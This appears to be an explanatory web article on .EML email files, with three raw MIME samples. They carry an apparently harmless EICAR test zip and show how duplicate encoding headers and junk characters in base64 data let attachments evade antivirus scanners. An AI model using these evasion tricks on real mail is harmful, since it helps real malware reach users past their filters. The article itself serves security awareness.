The .EML files are the type of files susceptible to 'transporting' viruses, Trojans and worms that could damage your system. Due to the ease of exchanging information that this type of files represents, it became a favorite target for hackers.
Traditionally, emails are transferred in the ASCII format and the MIME e-mail standard defines a form of structured mail and supports transport of the non-ASCII data. The complexity of the MIME standard makes different client and server implementations interpret MIME coded messages in different ways. This includes interpretation in scanning systems such as mail filters, IDS / IPS, mail forwarders, gateways or virus scanners.
An email MIME code can be modified very easily. Attachments encoded inside the MIME message could also be manipulated. It is possible to create malicious modifications in such a way that antivirus code will not detect it and e-mail could still be opened in e-mail clients like Mozilla Thunderbird or Microsoft Outlook.
If we take the following code, which represents an email with a body text and a .zip attachment encoded with Base64 and save it with the extension .EML, it could be opened in any email client capable of opening EML files:
From: [email protected]
To: [email protected]
Subject: plain
Content-type: multipart/mixed; boundary=foo
--foo
Content-type: text/plain
Virus attached
--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR
CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU
AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
--foo--
Just by adding a content transfer coding header "Content-Transfer-Encoding: quoted-printable"
and making contradictory declarations about coding, you can circumvent the parsing of the attachment by certain virus scanners while attachment will still be visible to the user.
From: [email protected]
To: [email protected]
Subject: plain
Content-type: multipart/mixed; boundary=foo
--foo
Content-type: text/plain
Virus attached
--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable
UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR
CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU
AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
--foo--
Base64 encoding standards allows adding non Base64 characters which will simply be ignored during parsing. But most of the modern antivirus programs do not support it and will not be able to correctly parse and open the attachment which will result in virus getting to user e-mail. Below is an example of Base64 attachment modified with junk characters.
From: [email protected]
To: [email protected]
Subject: plain
Content-type: multipart/mixed; boundary=foo
--foo
Content-type: text/plain
Virus attached
--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable
U.E.s.D.B.B.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q.
A.A.A.A.J.A.A.A.A.Z.W.l.j.Y.X.I.u.Y.2.9.t.i.z.D.1.V.w.x.Q.d.X.
A.M.i.D.a.J.C.Y.i.K.M.D.X.R.C.I.j.T.N.H.d.2.1.
j.S.v.V.X.H.1.d.H.Y.M.0.g.0.O.c.f
.R.z.c.Q.x.y.0.X.X.0.C./.E.M.8.w.w.K.D.d.Y.N.c.Q.0.O.0.X.X.z.
9.H.F.V.V.P.H.Q.9.t.A.C.A.F.B.L.A.Q.I.U.
A.x.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q
.A.A.A.A.J.A.A.A.A.A.A.A.A.A.A.A.A.A.A.C.2.g.Q.A.A.A.A.B.l.a.
W.N.h.c.i.5.j.b.2.1.Q.S.w.U.G.A.A.A.A.
A.A.E.A.A.Q.A.3.A.A.A.A.b.Q.A.A.A.A.A.A.
--foo--
In this way we have shown how easy it is to use a file with an EML extension to inject malware into a receiving system. To conclude, it is necessary to take preventive measures, especially in file sharing, to protect our systems.
For more details how MIME protocol could be manipulated to attach viruses visit Five Easy Steps to Bypass Antivirus using manipulated MIME page
EML Quick Info | |
---|---|
Email message in RFC-822 format | |
MIME Type | |
message/rfc822 | |
Opens with | |
Mozilla Thunderbird | |
Microsoft Outlook Express | |
Microsoft Outlook | |
EncryptoMatic EML Viewer | |
EML Viewer |